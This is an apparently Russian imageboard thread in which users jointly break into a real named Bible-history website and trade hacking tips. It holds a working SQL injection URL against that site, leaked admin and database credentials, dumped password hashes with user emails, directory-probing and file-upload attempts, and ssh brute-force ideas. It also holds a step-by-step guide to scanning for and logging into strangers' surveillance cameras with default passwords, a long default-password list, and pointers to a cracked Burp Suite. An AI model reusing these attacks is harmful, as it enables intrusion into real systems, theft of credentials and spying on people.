Пасаны, тут в общем такое дело...admin:adminpass:kidsdicthttp://www.bible-history.comКак обнаружилось, спросите вы? http://www.bible-history.com/subcat.php?id=-23%20union%20select%20concat%28table_name,0x3a,column_name,0x3a,table_schema%29+from+information_schema.columns+where+column_name+LIKE+CHAR(37, 112, 97, 115, 37) Только вот админку никто не смог найти даже из забугорных кулхацкеров. А сможешь ли ты?
BUMP
Это вам не по ftp с открытыми портами гулять
>>144622431 (OP)Забугорным хакерам не приходило в голову, что админка может быть прикрыта для определенных IP при помощи htaccess?
>>144622763мое дело принести
>>144622763странно, что о сокрытии позаботились, а про то, что пассы админа находятся при простом вбивании sql или при поиске(!) по сайту - нет
ВЗЛОМ КАМЕР ТРЕД #1 ВОЗРОЖДЁННЫЙСкачиваем iVMS-4200 - https://hikvision.ru/?q=download-clientСкачиваем VNC сканер - http://rgho.st/7756FhBQKСкачиваем Hikka - http://rgho.st/8HGpXTkjDИНСТРУКЦИЯ:1. Скачиваем и устанавливаем iVMS-4200, с его помощью мы сможем просматривать камеры.2. Создаем отдельную папку для нашего VNC и запускаем его. Ищем диапазоны IP и вставляем в большое окно программы. Искать диапазоны можно на этом сайте - https://4it.me/ . Далее, вписываем порт 8000 и нажимаем на кнопку "Start scan" , ждёте пока IP найдутся и закрываете консоль, далее нажимаете на кнопку "Start parser" и закрываете программу. ДАЛЕЕ, копируете IP из IPs.txt и вставляете в файл hosts который находится в папке Hikka, в папке хикка будет файл Start.bat, жамкаете на него и у вас открывается консоль, далее программа сама прочекает IP адреса на admin:12345 и результат вашего труда вы увидите в папке pics.3. Запускаем программу iVMS-4200 и вводим данные для входа в камеру.
теперь это уязвимостей трендж
>>144623636УУУУУУУУУУУУУУУУУУУУУУХАКЕРОВТРЕНДЖНАКОНЕЦТА
>>144623608Пидоры из /web опять вылезли.
>>144622431 (OP)нашел
>>144632139пали?
>>144632235дирбом пройдисьdirb
>>144632235как сам полажу выложу свои логи скана
>>144632235похакану всем кому не лень, хуета
>>144634837похакана*
>>144634854>>144634837ну так размести Абу на главной, плез. Почему её похакали, но не дефейсили?
>>144638176потому что нахуя?ради лулзов?что бы потом удалили такое отличное научное пособие идиотизма в безопасности?
>>144638810таких пособий весь гугл доркс пестрит, о чём ты?
>>144622900Чтобы патралеть хакиров-аметистов.Алсо нахуя этому сайту админка? Что это за cms такая?
>>144622431 (OP)Давайте посоны,ломайте. Представимся игиловцами, под руководством Макак Абу ибн Сосач.Разместим нашиды
>>144639260ты думаешь, что все сайты работают только на cms? ты из поколения, где сайты делают на wix и wp?
Чтобы хоть как-то заставить пользователей и админов защитить оборудование от хакеров, на сетевых ресурсах нередко публикуют перечни логинов/паролей по умолчанию для наиболее популярных марок оборудования. Наиболее полный список для сетевых камер видеонаблюдения на данный момент выглядит следующим образом (login/password):ACTi: admin/123456 либо Admin/123456American Dynamics: admin/admin либо admin/9999Arecont Vision: отсутствуетAvigilon: admin/adminAxis: обычно root/pass; в новых камерах при первом входе требуется задание пароляBasler: admin/adminBosch: отсутствуетBrickcom: admin/adminCanon: root/cameraCisco: по умолчанию пароль отсутствует, но при первом входе требует заданияDahua: admin/adminDigital Watchdog: admin/adminDRS: admin/1234DVTel: Admin/1234DynaColor: Admin/1234FLIR: admin/fliradminFoscam: admin/<пробел>GeoVision: admin/adminGrandstream: admin/adminHikvision: admin/12345Honeywell: admin/1234IQinVision: root/systemIPX-DDK: root/admin либо root/AdminJVC: admin/jvcMarch Networks: admin/<пробел>Mobotix: admin/meinsmPanasonic: admin/12345Pelco Sarix: admin/adminPixord: admin/adminSamsung Electronics: root/root либо admin/4321Samsung Techwin: admin/1111111 (старые модели), admin/4321 (новые модели)Sanyo: admin/adminScallop: admin/passwordSentry360 (mini): admin/1234Sentry360 (pro): отсутствуетSony: admin/adminSpeco: admin/1234Stardot: admin/adminStarvedia: admin/<пробел>Trendnet: admin/adminToshiba: root/ikwdVideoIQ: supervisor/supervisorVivotek: root/<пробел>Ubiquiti: ubnt/ubntWodsee: admin/<пробел>
>>144639562нет, это не стандартный пароль, но спасибо за базу
>>144639351Так нах ещё админка на сайте нужна. Либо cms, либо прямо на сервере сайт меняй.
>>144639150ладно, ты прав
Добавьте чтобы на фоне музыка играла.
>>144639747лучше что то тематическое, про сатану
блять, везде 500кривовкось все
Анон, раз уж такой тред, спрошу. А Абу не может на нормальный ssl разориться или что? Есть какие-то профиты этого бесплатного говна на 3 месяца?
>>144639820Можно что в духе: Добрались до Детройта, доберемся и до России. Слава Сатане. Абу Слава.https://www.youtube.com/watch?v=0r7mb4kj88w
>>144639939так ему интереснее видно
>>144639939Так-то был нормальный ссл, но после покупки мейл.ру что-то пошло не так.
>>144640021неспростажжключи шифрования интернета небось легче так передавать
>>144639637ftp
>>144640341он там есть, ищу доступ
https://www.youtube.com/watch?v=op918vGvCMo
>>144640021>но после покупки мейл.руЧего, блять?
>>144640532не знал, лол?
>>144640422http://www.bible-history.com/geography/admin/Чекай
>>144640614Мейлру купил харкач?
>>144640652Ты серьёзно? охуеть.
>>144640652дачто то еще говорили про иичан
>>144640636это квери для бд, херня
>>144640887>>144640971Ну охуеть теперь! Я правда не в курсе был. А давно, вообще?
>>144640422ЯНАШЕЛ САСАЙТЕ !ftp://54.201.8.54/
>>144641317https://2ch.pm/abu/res/52038.html
>>144641341у них даже такой домен был
>>144641402Ебать я слоупок. Спасибо за инфу!
>>144641341Осторожно, вредоносное ПО!Сайт 54.201.8.54 может установить на ваш компьютер вредоносное ПО, которое крадет или удаляет личную информацию (например, фотографии, пароли, сообщения и реквизиты банковских карт).
>>144641615у них там ссш кстати
>>144641615На самом деле я просто щкольник и наткнулся на эту пастебин-копипасту.http://pastebin.com/z5YEizeT
E:\bholocal\Bho\htdocs\geography\admin\addcat.cfmраскрытие путей
>>144641806Ничего не дает .Да и вообще сайт последний раз в 2005 трогали
>>144641999есть 2016 записи
Тут путьhttp://www.bible-history.com/cfcache.map
>>144642180И что это дает?
Ищи дурака за четыре сольдо.
>>144642310стыдно не знать
>>144642449Нит
База называется bible_history, если кому интересно
Почему именно этот сайт? Это какой-то хакирский мемас?
http://www.bible-history.com/piwik/
>>144643230нет, рандомный почти сайт
>>144622431 (OP)Старые добрые sql инъекции. Ты словно перенес меня в мой 2007.
>>144643230потому что он оказался одним из первых в поиске дорка, а потом, при проверке, оказался дыряв, как твоя ЕОТ
>>144643356ты не поверишь, но они работают и 2017-ом. Добро пожаловать. Снова
>>144638810>ради лулзов?Почему бы нет? Дефейсы - это весело.
>>144643409Но сегодня они уже практически неактуальны же. Если писать по последним стандартам php, так там в принципе такое явление, как инъекция, возникнуть не может. А остались они только в совсем уж старых движках.
>>144643368ДЫРЯВ, КАК МОЯ ЕОТ, НО ПУТЬ К АДМИНКЕ ЕСТЬ ТОЛЬКО У ОДНОГО, АЗАЗА!
>>144643717сайт 2000-2005 года, что с него взять
>>144643717миллион сайтов висит с давних времен и не переписывалось. Просто проверь стандартный дорк .php?=id И втыкай в любой SQL. Пожалуй, все поддадутся.
а это уже интересноhttp://www.bible-history.com/123/
>>144643959дляэтого уже есть скриптики которые сами по доркам набирают сайтецы и сплойтят
>>144643976ладно, это какая то хуевая заготовка
>>144643976>http://www.bible-history.com/123/нихуя
http://www.bible-history.com/quiz/admin/2 минуты поиска
>>144643959Да хер там, сейчас это не актуально. А в свое время, как раз в году 2007, я на этом таки поднял деньжат немного.
>>144644215хуйня, ищи заного
>>144644215нет. это не то, дурачок. Это квиз. Квиз - это типа тест. Так что не умничай. Админ квиза - это хуета. Это типа тебе позволят создать свой квиз и всё, сайт тебе никто не даст в ручки
>>144644218легалом? продавал инфу про уязвимости? Или нелегал и лил шеллы, пиздил пассы, сливал кредитки?
>>144644379>нелегал и лил шеллыthis. Тысячами.
ладно, впиздувот вам что нашел, ломайте, думаю это и есть админкамне впадлу брутитьhttp://www.bible-history.com/_privatehttp://www.bible-history.com/admin1/admin.php
Как, кроме sql инъекций, можно получить доступ к сайту?
>>144644740через твою мамкутысячи способов, или ты об этом сайте?
>>144644481ну, нашли что то, дорогие мои?
>>144644944сюда пасс не подходитМожет, дело в логине? ни bho, ни admin не идут
>>144645032Да там скорее всего та админка с базой и не связана вовсе, а пароль жестко прописан в php файле.
>>144645032думаю №144645147-анон правв базе есть еще пара паролей
>>144645220Можно попробовать залить файл через инъекцию. Маловероятно, конечно, что сработает, но хер его знает.Сейчас и не вспомню уже команд, давно я этим не баловался. Может погуглю сейчас да попробую.
>>144644481> http://www.bible-history.com/_privateКидает 500 при первой же попытке логина логин и пароль не из оп-поста и не дает разлогиниться ввести заново. ЧЯДНТ?
>>144645397Вангую, что сработает, лей
>>144622763Админка у Господа, алло!
>>144645546Не, не сработало. Права настроены.Query failed : Access denied for user 'bho'@'localhost' (using password: YES)
>>144645397это и делаю все это времявы вручную блять делаете все?рили?
>>144645704а куда лил?
>>144645734Вручную конечно. Такое только вручную и делается.
>>144645764Я без пути указал, просто файл, по идее должно было прокатить. Может там от корня указывать надо, но путь от корня я не знаю.
>>144645791на дворе 21 веккак минимум burpsuiteа вообще есть автоматические утилиты
>>144645852Впервые слышу, никогда такими не пользовался.
>>144645847нет,просто в ту папку закрыта записья бручу куда можно лить покатут нам и пригодяться слитые пути внутри фс
>>144645900поставь тогда как все тру-хакеры линукс или кали, и запусти sqlmap, ахуеешьон
>>144645917У тебя есть пути? Где нарыл? Скинь или скажи хотя бы, как нашел.
>>144645985вверху в треде смотрино прикол в чемпути слиты с вебсерваа нам нужны пути в бда это могут быть разные машиныбаннер на тебеweb application technology: Apache 2.4.23, PHP 5.5.38back-end DBMS: MySQL >= 5.0banner: '5.5.51'
>>144646192>а это могут быть разные машиныХер там, это одна машина user 'bho'@'localhost'
>>144646496то есть, где нашел?
>>144646552При попытке записи в файл вывалило. >144645704
Не получится кароче залить. sql юзер не имеет права.Там еще винда вообще, похоже, так, что никаких прав на папки нет.Да, еще ssh порт открыт, если что. Может кто побрутить захочет.
>>144646982неа, запрещено по паролям, только сертификаты похоже
>>144646608ну так это имя@имямашиныбда с чего решил что это тот же юзер на вебсерве?
>>144647084Чего? Sql cервер на той же машине стоит, вот я о чем.
>>144647171с чего так решил? я просто запутался в твоих обьяснениях и не могу понять
>>144647222Ну потому, что localhost написано же, ну емае. Если бы sql сервер был на другой машине, там был бы написан его адрес.
>>144647330ноупсмотриты пытаешь вписать в файл по пути "/pohui/etc/etc"(не учитываем что это венда) какой то бредбд запрашивает доступ и шлется нахуйи говорит что возникла ошибка у локального юзератак что все окей
>>144647524Ну хуй его знает, не проверял. Один хер, 99%, что база на этой же машине.
>>144647795Запись в папки вебсерва не пашет?А чтение?может можешь админ.пхп прочиатть?я ща попробую немного
>>144647889Тоже нет.http://www.bible-history.com/piwik/Сюда надо копать. Может из админки этой аналитической херни можно будет что то сделать. Нужно только узнать, где в базе от нее пароли лежат.
>>144647989есть сплойты даже на него, можно покопать их
>>144647989нет в базе от него таблиц, там должно быть пободноеlog_visit
>>144648914может от рута они только доступны
>>144647989Анон, тебя уже повязали?или ты слился просто?
>>144649565Да не, я тут. piwik же другую базу задействует, лол. Хер в нее попадешь.Сейчас хочу вытащить имена таблиц из базы bible_history, может в статьи получится php внедрить.
>>144649856у меня доступ к [] bible_glossary[] bible_history[] information_schema[] keywords[*] kidsdictесть...
>>144649965Напомни, как делать запросы из других баз? Я за 10 лет все забыл, лол.
>>144650064поставь скульмап и делай в нем,быстрее будета вообще вотhttp://ru.stackoverflow.com/questions/53344/%D0%92%D1%8B%D0%B1%D0%BE%D1%80%D0%BA%D0%B0-%D0%B8%D0%B7-%D0%B4%D0%B2%D1%83%D1%85-%D0%B1%D0%B0%D0%B7-%D0%B7%D0%B0-%D0%BE%D0%B4%D0%B8%D0%BD-%D0%B7%D0%B0%D0%BF%D1%80%D0%BE%D1%81
>>144650064слитые хешированные паролиuser_id,user_bio,user_pass,user_name,user_email,user_banned,user_regdate,user_numposts,user_timezone,user_bio_status,user_lastsession,user_newpassword,user_email_public,user_allowviewonline,user_lasttimereadpost1,<blank>,a1fba67e72b37d0ba83c2cc937172ec8eb1fda6d,admin,[email protected],0,1115584099,1,2.0,1,1115647107,<blank>,0,1,11156471072,<blank>,b404bbb52c91fe1f291ba9c2719aa7d916dc55e5,Jim,[email protected],0,1115584767,1,2.0,5,1115585298,<blank>,0,1,11155851263,<blank>,3a5fbfe524ec4319455769d5462eb2c4ac4cbe79,rusty,[email protected],0,1167079798,1,2.0,5,1167079798,<blank>,0,1,1167079887
>>144650321Откуда они?
>>144650445atabase: bible_historyTable: bho_board_users
>>144650553Все таблицы базы bible_history:Нужно копать administratorsbible_refcustom_questionsglossarygroupskjv_verselookupnavesquestion_commentsquestionsquestions_BACKUPquestions_copyquestions_import_testwordsEmailsadministratorsbh_addformbh_guestbookbho_board_bansbho_board_forumsbho_board_postsbho_board_searchbho_board_topicsbho_board_usersbible_bookbookscatcategorieschapterschapters1commentary_jfbeastonsguestbookisbekingjames
>>144650980jc:Mos3sодна пара, и все
Как успехи?
никак, я пошел спать, есть намного более интересные сайтыя бы еще побрутил пути, а потом пробывал бы искать пхп места иньекциино в пизду это
слушайте, а скуэльмап же умел, вроде, сливать файлы с сервака?
>>144653421читай тред, поймешь почему не получается
>>144653455я понял, что у вас туда залить не получаетсяа оттуда слить тоже?
>>144653517не я пробывално скульмап похоже не дружит с путями венды, там же обратный слеш
>>144653517Тоже. Это вообще исключительный случай, чтобы через sql можно было бы что то слить или залить.
>>144653660на самом деле нет, и на соревнованиях, и в реальной жизни не раз было
го может в тлг/ирку/джаббер перекатимся?
>>144653712Значит просто мне не попадалось.
>>144653763Можно. Интересно всетаки будет закончить.
>>144653763тоже думал, что для этого надо?есть тг акк
>>144653804Создать группу в телеграме.
>>144653763сколько нас тут вообще?я >>144644481,>>144632139-кун
БЛЯДЬ ОП ТЫ ЧО ДУРАКhttp://www.bible-history.com/quiz/admin/setup.phphttp://www.bible-history.com/geography/admin/
>>144654030давайте ники
https://t.me/joinchat/AAAAAAvFN2b-R98PPUPJ-A
Бля объясните в чем суть?
>>144654043я еще
>>144654211ломаем сайтец, четы
>>144643717Да ты что, правда чтоле? За эту скулю мне заплатили 500 баксов, из-за того, что домен не в рамках программы. А так, срубил бы штук 10, эх.мимо_успешный_багхантер
Админ на Небе
>>144654697Расскажи как стал, как научился
>>144654697бля, молодчинабурпсут, красаваесть лицуха кстати?
>>144654855Я давно собирался запилить тред для >анонов по этой теме, на ночном, но все лень.В кратце, как я начинал, гуглишь топ уязвимостей по OWASP и каждую разбираешь, гуглишь по ним статьи.Начинай с XSS, SQLi, RFI/LFI, path traversal. Это самые часто встречающиеся и легко детектящиеся уязвимости, кторые актуальны и по сей день везде. Даже в гугле.
>>144655014бля, приходи к нам в уютный чатик. https://t.me/joinchat/AAAAAECdwLriLV2EP0Eg_A
>>144654114ссылка протухлаhttps://t.me/joinchat/AAAAAECdwLriLV2EP0Eg_A
>>144654887В инете нагугли лоадер на год, дело 5 минут, я просто уже забыл откуда скачивал.
>>144655076А что вы там обсуждаете то? Какая тематика?
>>144655087можешь точнее описать пожалуйста?
>>144655087Недавно его выложили, на рдоте вроде есть точно.
>>144655132google: site:rdot.org burp suiteТам ветка была на форуме, и там выложили лоадер и сам бурп с лицензией на год.
>>144622431 (OP)ЛОЛ!Вчера владельцу сайта написал на почту о дыре.
>>144655187спасибо большое
>>144655194в базе на его же сайте полно комментов о том что сайт дырявый как портовая шлюха
>>144639270Хуиловцами представься. Надо славить Сотону!
>>144655122>А что вы там обсуждаете то? Какая тематика?Сайтик ломаем, лол.
>>144655418Не сорян, вы хуйней занимаетесь, если честно. Таких ноунейм сайтов, нахуй не нужных никому, даже админу, уязвимых к скулям, я в гугле сотню найду по простейшим гуглдоркам.
>>144640524>>144655283
она утонула
Ребят, подкиньте сурцы ragebot который недавно слили в сеть. Я знаю, у вас есть доступ к андеграундным форумам. Прошу, уж очень заинтересовал.
>>144660507и всплыла
опа
